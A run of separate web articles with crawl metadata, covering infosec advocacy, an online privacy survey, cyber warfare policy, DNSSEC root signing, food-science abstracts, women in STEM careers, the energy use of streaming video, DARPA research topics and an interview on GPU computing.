Many businesses are also failing to tackle this important issue. Not a day goes by that we don’t hear about another company suffering a security breach. Many of these breaches are avoidable, as shown by Verizon’s Data Breach Investigations Report, which highlights that of the breaches investigated in 2012 nearly 97% of them were avoidable using simple controls.
While many countries and organizations are failing to deal with computer security, others are seeing this failure as an opportunity. Criminals are quickly expanding their operations into the online arena, and they see the Internet as a fertile environment for making large amounts of money. Activists are using the Internet, and in particular social media, to publicize their causes and promote their messages. Hostile nation states, industrial espionage groups, and dissident groups are also looking to exploit our inability to work together to secure our systems.
Another group taking advantage of the confusion and lack of understanding in this arena are large lobby groups working on behalf of the defense and weapons industries. It is in the interest of these lobby groups to highlight the threat from online based attacks and look for governments to invest money and resources in this area.
All of the above operators are creating what I see as a perfect storm of confusion and mistrust, which I believe will cause great damage to all computer and Internet users. Overhyped threats and a lack of understanding of the problem will lead to overreaction by governments as they respond to the threat de jour as presented to them by the lobby groups. In the effort to appear to be dealing with these perceived threats, governments may introduce new laws that may not only fail to solve the problem, but will also negatively impact our privacy and online freedoms. We can already see this happening with lobby groups representing media organizations. They are successfully pushing laws dealing with copyright changes in order to protect their industries while legislation such as the Convention on Cybercrime – which could help address a lot of the issues we face – is ignored.
To counter this, the information security community needs to step up and provide the leadership required to ensure we maintain the security of the Internet while preserving our freedoms and rights. We can no longer afford to let others such as vendors, lobby groups, or politicians drive the agenda.
So I ask each of you to use whatever influence you have to ensure that those making policy decisions, whether in business or otherwise, are properly informed of what the real issues and preferred solutions are. Engage in a positive way with others, especially those outside our community, using blogs, social media or commenting on news stories so they are better informed on what the real issues are. In addition to all this, we also need to speak up when vendors and other interest groups overhype an issue for their own gain, and challenge their assertions. Finally, contact politicians to point out the threats that we face from criminals, badly thought out legislation and lobby groups forcing attention away from the real issues.
The Internet is a fantastic place, let’s take make the effort to ensure it remains that way.
Brian Honan is an independent security consultant based in Dublin, Ireland, and is the founder and head of IRISSCERT, Ireland’s first CERT. He is a Special Advisor to the Europol Cybercrime Centre, an adjunct lecturer on Information Security in University College Dublin, and he sits on the Technical Advisory Board for a number of innovative information security companies. He has addressed a number of major conferences, he wrote the book ISO 27001 in a Windows Environment and co-author of The Cloud Security Rules. He regularly contributes to a number of industry recognized publications and serves as the European Editor for the SANS Institute’s weekly SANS NewsBites. | <urn:uuid:49949b1a-4d4b-4e06-9359-151e3836eda4> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2013/04/10/a-call-to-arms-for-infosec-professionals/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00579-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962856 | 1,137 | 2.78125 | 3 |
More Americans are concerned about not knowing how the personal information collected about them online is used than losing their principal source of income.
A new study by TRUSTe and the National Cyber Security Alliance found that online privacy concerns topped the loss of personal income by 11 percentage points, even as only 3 in 10 (31%) Americans understand how companies share their personal information.
Likewise, the business impact of consumers’ privacy concerns remains high with 89 percent avoiding companies they don’t believe protect their privacy and 74 percent of those who worry about their privacy online limiting their online activity in the last 12 months due to their concerns.
Just 56 percent of Americans trust businesses with their personal information online, exposing a remarkably lacking level of trust. To close this gap, it appears consumers are demanding more transparency in exchange for trust and want to be able to control how data is collected, used and shared with simpler tools to help them manage their privacy online.
46 percent don’t feel they have control of any personal information they may have provided online, 32 percent think protecting personal information online is too complex and 38 percent of those who worry about their privacy online say companies providing clear procedures for removing personal information would increase trust.
Interestingly given the recent introduction of the so-called ‘Right to be Forgotten’ for Europeans in the EU General Data Protection Regulation, 60 percent of their American counterparts think they also have the right to be forgotten.
With the recent terrorist attacks in Paris the month before this survey was conducted, there has been a fall in the numbers who think online privacy is more important than national security (38 percent) down seven percentage points from last year’s study. 37 percent think losing online privacy is a part of being more connected.
Among all online adults, 36 percent have stopped using a website and 29 percent have stopped using an app in the last twelve months because they did not trust them to handle personal information securely. 47 percent of adults who have stopped using either a website or app said that this was because they were asked to provide too much information. Interestingly 19 percent said they continued to use a website they didn’t trust to handle their personal information responsibly, with 31 percent of those who reported doing this saying it was because it was the only website that sold a particular product or service.
Trust remains a significant issue with 56 percent of American Internet users trusting most businesses with their personal information online. Healthcare providers (74 percent) and financial organizations (72 percent) were most trusted to handle personal information responsibly. Social Networks (35 percent) and advertisers (25 percent) were the least trusted.
There is more that businesses can do to lower consumer concern and improve trust. Among those who worry about their privacy online, the two top ways to lower privacy concerns were companies being more transparent about how they are collecting and using data (35 percent) and having more easy to use tools available to protect personal information (35 percent). | <urn:uuid:b455da23-03c3-4754-8cb8-6a775995c101> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2016/01/29/consumers-are-increasingly-concerned-about-privacy-and-theyre-acting-on-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00103-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964641 | 595 | 2.671875 | 3 |
Uncertain State Of Cyber WarJust what does "cyber warfare" mean? We're still figuring out tactics and capabilities.
Military agencies worldwide are right in the middle of figuring out the tactics and capabilities that will be critical in any future cyber war. So far, any conflicts are playing out behind the scenes, with only the rare accusation or public request for technology giving a glimpse into what offensive attacks between countries might look like.
Even what counts as "cyber warfare" remains an open question. Many cite as the first-known example of such operations the distributed denial-of-service (DDoS) takedowns and hijacking of government and business websites in the country of Georgia in 2008, at the same time as Russian military operations on the ground.
But there's scant proof that the Russian government launched or sponsored online attacks against Georgia, according to many security experts, including Robert David Graham, CEO of Errata Security. "There's no evidence the cyber attacks were by the Russian government, or that they were anything more than normal 'citizen hacktivism,'" he said in a blog post. It's notable that this supposed first-ever cyber war served no clear military purpose. Attackers compromised informational government websites, not critical infrastructure systems or military networks.
To be fair, even the would-be practitioners of cyber warfare -- namely, the U.S. military -- are themselves soliciting input on what offensive computer system attacks might look like, either on their own or in conjunction with physical operations and kinetic attacks.
Last year, for example, the Defense Advanced Research Projects Agency (issued a call to tech vendors for "cyberspace warfare operations" capabilities, as part of what Darpa dubs Plan X. Darpa seeks a broad range of capabilities, from a scripted counterresponse to a cyber attack to IT infrastructure that could be hardened to withstand attacks.
Similarly, the Air Force Life Cycle Management Center last year called on contractors to submit concept papers for "cyberspace warfare operations" capabilities, including "cyberspace warfare attack" and "cyberspace warfare support."
Capabilities on the Air Force wish list include "employing unique characteristics resulting in the adversary entering conflicts in a degraded state." In other words, why blow up an enemy's tank if you can instead somehow infect and kill the tank's electrical system?
Who else is bolstering their cyber war capabilities? Iran is a strong candidate, and in April 2012, the VP of the American Foreign Policy Council, Ilan Berman, told a U.S. House committee that Iran has been boosting its cyber warfare resources in the wake of online attacks against the country. The attacks include Stuxnet, malware blamed in 2010 for trying to attack power plant infrastructure. U.S. officials have accused the Iranian government of sponsoring DDoS attacks against U.S. banks. China has reportedly mobilized its own cyber army, and Russia last year launched a recruitment drive to find the country's best hacking minds, seeking people versed in "methods and means of bypassing antivirus software, firewalls, as well as in security tools of operating systems," the newspaper Pravda reported.
But while governments don't face the same legal problems that companies do when considering offensive attacks, they do face the same major intelligence challenge: accurately tracing an attack's true origin, a process known as attribution. While small-time cybercriminals may leave tracks, government-backed professionals will go to great lengths to hide what they're doing -- or perhaps, pin blame on another enemy. | <urn:uuid:da7f5477-4a1b-471e-8f95-28531a1c433f> | CC-MAIN-2017-09 | http://www.darkreading.com/risk-management/uncertain-state-of-cyber-war/d/d-id/1108255?cid=sbx_byte_related_commentary_government_and_vertical_industry_security_nasa_tightens_security_in_response_to_in&itc=sbx_byte_related_commentary_government_and_vertical_industry_security_nasa_tightens_security_in_response_to_in | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00224-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946316 | 722 | 3.03125 | 3 |
Back in January 1997, a group of people developed RFC 2065, Domain Name System Security Extensions, a document detailing the introduction of private/public key cryptography into the public DNS system. By adding cryptography to the DNS, users would be able to verify that DNS responses they receive are genuinely valid and accurate. The design of DNSSEC was updated in March 2005 by RFC 2535 but was never deployed.
In March 2005, RFCs 4033, 4034, 4035 were published, detailing a new version of the protocol named DNSSEC.bis. This version of the protocol is easier to understand and deploy, but was never widely paid attention to until the summer of 2008. Those of us in the industry knew that DNSSEC was important, but the operational management, increased query size, and technical problems with many implementations of DNS prevented it from being deployed.
The "DNS Summer of Fear" occurred in 2008, when security researcher Dan Kaminsky exposed a vulnerability in the DNS protocol where DNS cache poisoning could be achieved in just a few seconds allowing an attacker to spoof the DNS identify of a website. A short term fix, known as DNS Source Port Randomization, was deployed to help fend off attacks, while movement on a long term solution began work. The long term fix requires the use of DNSSEC to securely sign and validate the global DNS system, and with all things DNS, starts with the security of the DNS Root Zone, a.k.a ".".
The DNS Root Zone is produced and maintained through a collaborate effort between ICANN, VeriSign, and the U.S. Department of Commerce. These three organizations have been extensively working to develop a secure and transparent way to manage the signing of the Root Zone since early 2009, and on July 15, 2010, the fruits of their labor will become reality when the signed root is deployed.
On June 16, 2010, the first of two Root Key Signing Key (KSK) generation ceremonies was performed at a secure ICANN facility in Culpepper, VA. On July 12, 2010, a second KSK ceremony will occur at a second secure ICANN facility in El Segunda, CA. The purpose of these ceremonies is to generate the specialized cryptographic materials needed to sign the root zone, distribute copies to two secure facilities, distribute the cryptographic fingerprint data to Trusted Community Representatives (TCRs) for verification, and to distribute crypto material to Recovery Key Share Holders in case of failure of these two ICANN facilities.
At Dyn Inc., we await the deployment of the signed Root Zone with much excitement. A signed root zone means that key stakeholders are paying attention to the criticality of the DNS and the role it serves in the Internet. To do our part, we've taken the following steps to DNSSEC-enable our systems and infrastructure:
In the coming months, we'll continue to enable DNSSEC communication with other registries, and develop additional ways to manage DNSSEC crypto material to provide our users with an easy and simple path to DNSSEC signing their DNS zones. In the meantime, we all look forward to the signed root deployment on July 15th.
Written by Tom Daly, Chief Technology Officer at Dynamic Network Services, Inc.
Dyn is a cloud-based Internet Performance company. Dyn helps companies monitor, control, and optimize online infrastructure for an exceptional end-user experience. Through a world-class network and unrivaled, objective intelligence into Internet conditions, Dyn ensures traffic gets delivered faster, safer, and more reliably than ever. Learn More
|Data Center||Policy & Regulation|
|DNS Security||Regional Registries|
|Domain Names||Registry Services|
|Intellectual Property||Top-Level Domains|
|Internet of Things||Web|
|Internet Protocol||White Space|
Afilias - Mobile & Web Services | <urn:uuid:f50af8b3-62ba-4244-befd-fb7746ed383e> | CC-MAIN-2017-09 | http://www.circleid.com/posts/the_root_dnssec_deployment_and_dyn_inc/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00576-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.917254 | 791 | 3.125 | 3 |
Holownia P.,Sanitary Inspectorate |
Jaworska-LUczak B.,Sanitary Inspectorate |
Wisniewska I.,Sanitary Inspectorate |
Bilinski P.,Sanitary Inspectorate |
And 3 more authors.
Polish Journal of Food and Nutrition Sciences | Year: 2010
The prebiotic inulin is a non-digestible carbohydrate which occurs naturally throughout the normal human diet. Following passage through the gastro-intestinal tract inulin ultimately becomes metabolised to fructose by colonic bacteria, especially the beneficial species, whose growth are also promoted at the expense of the harmful types. There has been much recent attention by industry and the general public in the EU concerning inulin and prebiotics, especially in the marketing of their derived/supplemented products that includes the Central & East European region, (CEE) [Halliday, 2008]. Major benefits to human health have been reported variously worldwide and chiefly consist of maintaining healthy microbial gut homeostasis, reducing gut inflammation and infection, preventing colonic cancer, increasing mineral reabsorption, decreasing cholesterol, improving bowel habits, being of use in diabetic treatments and enhancing immune function. Inulin can thus be of great potential benefit to public health not just through these physiological effects but also in helping to reduce weight by replacing fat and digestible carbohydrate in food products. It is also important however to recognise the likely hazards of inulin arising mainly from fructose intolerance and rare cases of allergy. In addition under certain medical conditions it is possible that the growth of other harmful gut bacterial species may become stimulated with a potential but as yet unproven link to autoimmune disease. This article aims to review and discuss the scientific evidence as well as addressing general concerns raised by consumers and the general public alike. Recommendations based on current knowledge are suggested at the end. © Copyright by Institute of Animal Reproduction and Food Research of the Polish Academy of Sciences. Source
Bilinski P.,Sanitary Inspectorate |
Bilinski P.,Institute of Haematology and Transfusion Medicine |
Kapka-Skrzypczak L.,Institute of Rural Health |
Kapka-Skrzypczak L.,Health Management Technology |
And 4 more authors.
Annals of Agricultural and Environmental Medicine | Year: 2012
Shiga toxin producing Escherichia coli (STEC) are the most virulent diarrhoeagenic E. coli known to date. They can spread with alarming ease via the food chain, as recently demonstrated by the large outbreak of STEC O104:H4 borne by sprouted seeds in 2011, clustered in northern Germany, and subsequently affecting other countries. Indeed, a significant number of infections to verocytotoxin producing Escherichia coli O104:H4 have been reported from the WHO European Region resulting in many cases of bloody diarrhoea and haemolytic uraemic syndrome in Germany, 15 other European countries and North America. Eventually, the European Food Standards Agency, (EFSA), identified the likely source to a single consignment of fenugreek seeds from an Egyptian exporter as being linked to the two outbreaks in Germany and France. The situation was closely monitored by the Chief Sanitary Inspectorate public health authority in Poland where actions undertaken ensured that the public was well informed about the dangers of STEC contamination of food, how to avoid infection, and what to do if infected. Tracing the fenugreek distributors also enabled the identification of suspected batches and their isolation. As a result, there were very few reported cases of STEC infection in Poland. Effective control over such outbreaks is therefore a vital public health task. This should include early detection and rapid identification of the contagion mode, followed by removing the foodstuff(s) from the market, providing consumer advice, and preventing secondary spreading. As a mitigation measure, screening/monitoring those involved in food handling is also warranted to exclude carriers who can be asymptomatic. Source | <urn:uuid:98825f4d-f630-47c0-97be-6152fb8bd269> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/sanitary-inspectorate-1834587/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00100-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.938969 | 822 | 2.640625 | 3 |
Tackling the problem of getting women into STEM careers
This feature first appeared in the Summer 2015 issue of Certification Magazine. Click here to get your own print or digital copy.
Tech skills will be required in 80 percent of all jobs in the next decade, yet women in technology have been declining since 1991. At the current rate of decline, fewer than 1 percent of the global tech workforce will be female by 2043.
STEM (science, technology, engineering, and math) jobs are twice as likely to be held by men, even in a randomized, double-blind study. Monica Eaton-Cardone, founder and CIO of Global Risk Technologies, says that in order for today’s women to have a chance tomorrow, gender must become a non-factor.
“The opportunity to add a valuable contribution to society through technology is a benefit that should be promoted more — especially to women,” says Eaton-Cardone. She believes that women are interested in STEM opportunities, but don’t get many chances to develop or pursue that interest. Eaton-Cardone points to the 66 percent of fourth-grade girls who are interested in math and science — yet only 18 percent of college engineering majors are female. Currently, only 1 in 4 STEM jobs is held by a woman. Eaton-Cardone says that in order to change this, women need to be encouraged and women need to be educated on the growing potential of STEM careers.
Eaton-Cardone is a unique case for women in STEM, excelling in a field of men despite having no formal IT background. Her creative solutions for payment processing in Chargebacks911, eConsumerServices, and Global Risk Technologies have enabled merchants, consumers and banks to find solutions for their online businesses. Even taking the rare success stories into account, however, there are many questions when it comes to women in STEM:
● Why do young girls lose their enthusiasm for math and science?
● How can society offer encouragement to women in STEM?
● Why are STEM industries averse to women?
● What programs/opportunities exist to encourage girls in STEM?
● How can companies learn about potential bias in hiring practices? What can they do to change this?
● What are your recommendations to women who would like to get into technology or IT?
Monica Eaton-Cardone made a career out of discovering where there is a problem and then solving it herself. She then develops solutions for others who are experiencing the same problem. Eaton-Cardone has a 20-year background in developing retention campaigns, which entails developing technologies around monitoring key performance indicators to help track advertising performance, customer acquisition trends, and other factors that help to secure customers.
Her career expanded to the online arena, which she claims is a totally different ballgame because it is constantly evolving. As with brick-and-mortar businesses, principles such as “The customer is always right” are important. But the online arena uses a spaceless customer where there is less accountability for both consumer and merchant, and a reduced barrier to entry for merchants on a global scale. That introduces some unique problems in business — problems that are hard to quantify because online business is a moving target.
Take chargeback and credit card processing, for instance: “Technology solutions follow the technology criminals,” Eaton-Cardone says. “It is the ‘genius criminals’ who are actually responsible for creating a revolution in this industry because we’re all trying to stay ahead of them — and keep up with the loopholes that they expose — to make our systems even more secure. However, the minute you think that you have the best, most secure system, you’re dead in the water because just a few months go by and someone else has figured out some other way to expose a weakness in your online presence.
“You have to continually re-invent and recognize that the most relevant data to analyze when it comes to the economy today is the present, not necessarily historical. I developed a software program strictly for my own use because I found there was such confusion in handling chargebacks and being able to analyze risk in the online environment. Lo and behold, there were a number of other online merchants who needed that solution as well, which gave birth to Global Risk Technologies to serve these online merchants.”
Eaton-Cardone’s first project was developing a VOIP (Voice Over IP) technology that connected call centers in four countries so that she could analyze the results. Her education lies in architecture, so she was not exactly interested in IT. What she was interested in, though, was building things and solving problems. She enjoys math, and she likes organizing ways to solve a problem. Technology was something she fell into as a result of solving a problem with well-defined requirements.
Can any of us get away from technology? Eaton-Cardone says that every woman on the planet has a natural interest in technology and would expose that talent if she tried it. She believes that women, in general, have an aptitude for design and creativity, tapping into their talents in structure and organization. Most mothers are proficient multi-taskers, she says. This is what technology is! Women just use a different set of tools.
Eaton-Cardone has a daughter who is 8. Her daughter is as good with Legos as any boy of the same age, and Eaton-Cardone is certain that her daughter would enjoy a robotics class. At the same time, she’s certain that her daughter would not consider taking such a class without ample encouragement from her mother. By their teenage years, most girls have not been afforded much opportunity to be exposed to what technology is.
Girls would enjoy developing a computer program on their iPhones because it’s creative. They would be designing something — it’s not just math; they’d be applying their talents. “Boys are probably more likely to learn math at a faster pace because they take courses like wood shop, and guess what wood shop is?” Eaton-Cardone says. “A bunch of angles that allow them to apply math to their creativity with the wood; they’re learning a skill (wood shop) in tandem with math.”
How do we provide the same opportunities to girls? The top-down approach — putting pressure on corporations to hire more women — is not only unworkable but is actually damaging. What ends up happening is that people are interviewed to become computer programmers or coders, and there aren’t any women to interview. Eaton-Cardone says she may have one woman out of 100 applicants, and she must fight the impulse to hire that one woman, because to do so would make that woman a charity case.
Suppose, for example, that the lone female applicant is not as qualified as the male applicants. So now there is a woman who is setting an example for every other woman, and she’s not very good. To hire her simply to make a statement would not be fair to her, to women in general, to the corporation, or to the 99 men who applied. Trying to incentivize female applicants with money or scholarships doesn’t work because men and women go to college to pursue their passions. Oftentimes money is not enough to get them to change their passions. One needs to start at a younger age.
Eaton-Cardone says she overheard a man at a seminar, who said, “We’re giving everyone the same opportunity.” But Eaton-Cardone claims it’s not an opportunity if we’re telling a 13-year-old to choose between a sewing class and learning robotics. It would be an opportunity to actually require students to take a robotics class to allow that exposure to technology to happen.
“If the only piano players we had on the planet were very young children who expressed a desire to learn piano, we’d have no pianists,” Eaton-Cardone says. “You expose them to something with parental stewardship, and the children learn whether or not they have a talent for the skill and become engaged. Boys are drawn to STEM because they are more naturally interested in computer games, and girls are drawn to creativity and design work. Women aren’t given an opportunity early in their lives to put their creativity and design talents together with technology.”
Technology is a genderless field. One cannot expect a girl at the age of 13 to decide everything in which she’s going to be interested. In Asia, girls are required to take trigonometry, which allows them to consider a career in STEM. Many IT pros are given the flexibility to work from home or telecommute. If one has the talent, one has terrific flexibility and opportunity if a STEM field is chosen. Women do not recognize the freedom that is afforded by a STEM field. One is hired because of one’s talent and interest in STEM, just as men are.
It would be interesting to see how many girls would pursue a STEM career if they took wood shop. Expose them to areas outside a traditional girl’s comfort zone, and more girls will go into STEM. The best learning comes when there is an application method for the theory being taught. Girls can’t be expected to naturally excel in math when they are only given theory without any application for it. Boys are naturally choosing things that apply the math theory.
Eaton-Cardone: “We like to say that a person either has the STEM gene or he/she doesn’t. At Global Risk Technologies, we hire a woman as an executive assistant, and we will reveal her hidden abilities in numbers. We hear women saying, ‘I like to help people,’ and women don’t realize that majoring in STEM will allow them to help many more people than studying non-STEM subjects. But they’ve never seen how they can apply their natural abilities. You can learn how to do anything online. Opportunities are boundless. It’s back to having confidence in trying new things; thinking outside the box. It is damaging to women to tell them they are the underdog. The men out there are producing. Don’t be afraid to start at the very bottom, and if you perform, the company will recognize this. If you feel sorry for yourself, you will become a liability to that company.”
Some final advice to women in technology from Monica Eaton-Cardone: Find a subject about which you can be passionate. Find a mentor in that subject area and become excellent at it. This takes work and many hours. Turn your interest into a passion. Invest in yourself. Pick it and stick with it.
Actor Marc Anthony told reporter Meredith Vieira what his father said to him many years ago. “My dad told me early on, he said, ‘Son, we’re both ugly.’ I swear, he says it to this day. And he goes, ‘You work on your personality. It builds character.’ ” We would have a better planet if both men and women put 100 percent of their efforts into their passion for something. Why can’t that something be STEM? | <urn:uuid:1967fbe8-cddc-4b30-ab9c-4c530ec68d2a> | CC-MAIN-2017-09 | http://certmag.com/tackling-problem-getting-women-stem-careers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00276-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.96955 | 2,328 | 2.765625 | 3 |
The next time you watch “House of Cards” on Netflix, think about the impact you might be having on the environment.
As the Internet powers ever more services, from digital video to on-demand food delivery, energy use in data centers will rise. To reduce their impact on the environment, companies like Apple, Google and Facebook have taken big steps to power their operations with renewable energy sources like hydro, geothermal and solar.
But despite those efforts, the growth of streaming video from the likes of Netflix, Hulu and Google’s YouTube presents a pesky challenge to the companies’ efforts to go green, according to a report Tuesday from Greenpeace.
“The rapid transition to streaming video models, as well as tablets and other thin client devices that supplant on-device storage with the cloud, means more and more demand for data center capacity, which will require more energy to power,” the report’s authors wrote.
It might seem that online services, like video streaming, would reduce carbon footprint versus, say, driving to a movie theater. But by enabling much higher levels of consumption, the shift to digital video may actually be increasing the total amount of electricity consumed, and the associated pollution from electricity generation, the report said.
“Unless leading Internet companies find a way to leapfrog traditional, polluting sources of electricity, the convenience of streaming could cause us to increase our carbon footprint,” wrote the authors of the report, ”Clicking Green: A Guide to Building the Green Internet.”
The report ranked companies efforts in the area of renewable energy, by looking at company supplied data on energy use, publicly available information, and other data center investments. Apple took top marks, partly due to its investments in solar and its level of transparency toward reducing its carbon and energy footprints for its data centers. Google and Facebook also scored highly, partly due to their lowered reliance on dirtier forms of energy like coal and natural gas.
The authors did not rank Netflix, YouTube or Hulu, but they did identify online video as by far the biggest driver of consumer Internet data. Streaming video services now make up more than 60 percent of consumer Internet traffic and are expected to be 76 percent of traffic by 2018, according to the Greenpeace report, citing data from Cisco.
YouTube owner Google has a long term goal of being 100 percent renewably powered, though it’s currently only at 35 percent. In the Greenpeace ranking, Google achieved a clean energy index of 46 percent—Apple got 100 percent—which took into account Google’s energy transparency and its specific renewable energy projects. Over the past year Google has signed three long-term contracts to buy clean energy from producers, the Greenpeace report said, adding to six previous contracts. The company has also advocated for policies that would reduce the U.S. dependence on coal and fossil fuels.
In addition to rising consumer data demands, the report’s authors identified uncooperative utilities that rely on coal to generate power in data center hot spots like Virginia and North Carolina, as a barrier toward wider use of renewable energy.
In North Carolina, customers are not allowed to buy power from anyone other than Duke Energy, which gets only 2 percent of its electricity from renewable sources, according to Greenpeace. Google and other IT companies have supported a renewable energy tariff for large customers in North Carolina, the report said, but Google has not signed up for the program. | <urn:uuid:7320af14-d38c-413e-b9a8-726fe824f2ba> | CC-MAIN-2017-09 | http://www.itnews.com/article/2921896/greenpeace-fingers-youtube-netflix-as-threat-to-greener-internet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00276-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949408 | 701 | 2.875 | 3 |
If you are looking to develop some far out advanced science project -- and the folks at the Defense Advanced Research Projects Agency have a ton from airplanes that can fly for years without landing to skeletal putty for fractured bones – then DARPA wants you.
The military’s cutting edge research agency is accepting scientists for its Computer Science Study Group (CSSG) who’s goal is to quickly identify ideas in the field of computer science that DARPA says will provide revolutionary advances to the Department of Defense (DoD).
The CSSG has, as you might guess, a wide and varied list of projects it would like to see. Some of those include:
· Bio-inspired Exploitation Systems: Bat sonar, ant colonies, and immune systems are examples of biological systems that have inspired the development of algorithms applicable to difficult and large problems in a variety of areas. Examples include genetic and evolutionary algorithms, neural networks, new ideas for developing routing algorithms in wireless networks inspired by biology, including software and algorithms endowed with capabilities such as adaptation, evolution, growth, healing, replication and learning. Potential applications of interest to the military include autonomous intelligent vehicles, adaptive video processing algorithms, flight and other control systems, and medical data analysis.
· Biometrics: DARPA is interested in the development of novel and improved technologies for measuring and analyzing human body characteristics, such as fingerprints, eye retinas and irises, voice patterns, facial patterns and hand measurements, for authentication purposes. Desirable characteristics of proposed techniques include minimizing key metrics such as the percent of invalid users who are incorrectly accepted as genuine users, the percent of valid users who are rejected as imposters, and the percent of valid users who are not recognized by the system.
· Complexity Theory: Complexity theory deals with classifying computational problems by the amount of computational resources they require, or, more specifically, the number of processing steps and the memory required for their solution. DARPA is particularly interested in means of determining what techniques exist for speeding up the solution of problems in high performance computing, and what the bounds on computation speed are for various types of computer architectures, including scalar, parallel, distributed network, etc.
· Computer Vision: Computer vision is devoted to picture and video analysis to achieve results comparable to those of a human viewer. Potential applications include medical imaging, video surveillance, detection and tracking of individuals and vehicles, and video compression. Methods that include implementation of machine learning are of particular interest, but DARPA will also consider methods designed to solve specific tasks more effectively than previous systems.
· Detecting Deviations from Normalcy: Pattern recognition theory tends to focus on events and patterns that are relatively constant over time. Dynamic models of activity, however, attempt to analyze trends and extrapolate patterns to expected behavior patterns in the future. Beyond predicting trends in patterns that an analyst might wish to detect because they represent a threat, more advanced theories might attempt to model or predict patterns that represent normal behavior, so that threats can be detected as deviations from that normalcy pattern. Potential applications include the detection of intrusions in computer systems and networks, and the detection of medical anomalies.
· Information Accessibility, Integration, and Management: DARPA is interested in next-generation methods, tools, and technologies to make it possible to access, integrate, analyze, and efficiently manage massive stores of widely distributed, heterogeneous information. These capabilities will help human analysts make better use of all available information resources in the pursuit of knowledge relevant to military applications. Examples of possible research areas include development of human-computer interaction features that enable rapid, easy access to and understanding of heterogeneous information, and of cognitive systems able to “learn,” adjust to change, and repair themselves to enhance battlefield robots.
· Machine Learning: Machine learning is the study of computer algorithms that improve automatically through experience, typically involving systems that perform tasks associated with artificial intelligence. DARPA is interested in techniques for improving the efficiency and effectiveness of systems via the autonomous acquisition and integration of knowledge, and exploitation of this knowledge to enable continuous self-improvement. Potential military applications include robot locomotion, wargaming, object recognition in computer vision, speech and handwriting recognition, bioinformatics, and medical diagnosis.
· Network Management and Modeling: Our military services depend on a broad array of interacting physical, informational, cognitive, and social networks. Greater fundamental network understanding is essential to insure they function reliably and smoothly, and are not vulnerable to attack. This gap between what is known and what is needed to ensure the reliable and secure operation of complex networks makes the transition to network-centric operations problematic. DARPA is interested in developing the fundamental knowledge necessary to design large, complex networks in a predictable manner.
· Pattern Recognition: Pattern recognition aims to classify data (patterns) based on either a priori knowledge or on statistical information extracted from the patterns. The patterns to be classified are usually groups of measurements or observations, defining points in an appropriate multidimensional space. New and innovative breakthroughs in pattern recognition would be immediately applicable to information analysis.
· Smart Surveillance Systems: DARPA is interested in smart surveillance systems that use automatic image understanding techniques to extract information from the surveillance data. In addition to proposals which consider the information extraction aspect of the challenge, DARPA will also consider those that address the use of extracted information in the context of search, retrieval, data management and investigation.
· Software Engineering: The process of software development and evolution is an ambitious undertaking involving complex, incomplete, sometimes inconsistent and often fuzzy factors. Variables concerning design, quality, reliability, stakeholder interests and objectives, moving targets, and constraints such as budget and timeline must all be considered throughout a dynamic life cycle. The challenge is to provide sound methodological support for enabling good decisions about processes and products, risks and bottlenecks as well as for selection of tools, methods and techniques.
DARPA estimates up to 12 researchers will be accepted as part of the 2009 CSSG. August 11, 2008 is the cutoff date.
Layer 8 in a box Check out these other hot stories: | <urn:uuid:495236d7-0a23-4127-87ef-42cbb891c738> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2344880/security/darpa-looking-for-wicked-cool-researchers-for-advanced-study-group.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00452-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927905 | 1,239 | 2.609375 | 3 |
Steve Wallach, a supercomputing legend and recipient of the 2008 IEEE Seymour Cray Award, has participated in all 22 supercomputing shows. He is known for his contributions to high performance computing through the design of innovative vector and parallel computing systems. He is co-founder and chief science officer for Convey Computer Corp., a new company with a hybrid-core computer that marries the low cost and simple programming model of a commodity system with the performance of customized hardware architecture.
Never short on opinions, especially when it comes to high performance computing, Steve Wallach talked to HPCwire about the future of HPC and how lessons from the past can point the way for the future.
HPCwire: There’s been a lot of talk about how recent architecture advancements will bring GPU computing into the mainstream for high performance computing with significant speedups and energy savings. You disagree. Why?
Steve Wallach: GPUs are an interesting technology and some applications will probably see significant speed-up, but I don’t see them in the mainstream. Here’s why: programmers will have to put in a lot of effort to get the speed-up. Real-world applications consist of millions of lines of code, and organizations have invested too much money in those programs. If you tell them they have to modify those programs to use your technology, you lose. And it’s not just the software that has to be changed; it is the entire programming eco-structure: debuggers, profilers, and programming memory. Anything that disturbs those underlying realities is destined to become a niche player. This is the biggest difference between an accelerator and a coprocessor. A coprocessor is an extension to the instruction set and is part of the same environment. GPUs are not. A GPU consists of two different programming environments and you have to move the data back and forth between them to get the benefits. The host cannot see the memory of the GPU; there are two separate address spaces.
It’s similar to what we saw with attached array processors in the 80s. What we saw back then that you had to explicitly move and manage the data — which reduced programmer productivity, raised actual cost of ownership and ultimately reduced performance. Like back then, the GPU programming model is different from its host.
